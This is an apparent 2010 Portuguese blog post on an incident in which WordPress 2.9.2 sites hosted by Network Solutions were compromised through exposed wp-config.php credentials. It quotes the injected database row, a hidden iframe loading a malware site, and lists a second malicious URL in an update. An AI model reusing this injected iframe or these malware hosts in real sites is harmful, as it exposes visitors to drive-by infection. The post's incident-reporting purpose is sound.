Ontem foram publicados alguns alertas (Sucuri, NetworkSolutions, TechCocktail) de que o WordPress, mais propriamente a última versão 2.9.2, estaria vulnerável.
A razão deste alerta foram as centenas de blogues comprometidos e infectados com malware, principalmente em alojamentos do NetworkSolutions.
Hoje, o Sucuri em colaboração com o a equipa do NetworkSolutions, chegaram à conclusão que os incidentes ocorreram com a falta de permissões adequadas no ficheiro de configuração do WordPress (wp-config.php) e que um utilizador malicioso conseguiu aceder, num dos servidores do NetworkSolutions, aos dados de acesso da base de dados de cada cliente vulnerável e inseriu um iframe para um website com malware.
(2, 0, ‘siteurl’, ‘<iframe style=\”display:none\” height=\”0\” width=\” 1\” src=\”http://networkads.net/grep/\”></iframe>’, ‘yes’),
Na minha opinião a equipa do WordPress devia rever as regras de segurança numa instalação default.
Actualização (11-04-2010):
Também já foi identificado o mesmo ataque usando o endereço do iframe:
http://mainnetsoll.com/grep/
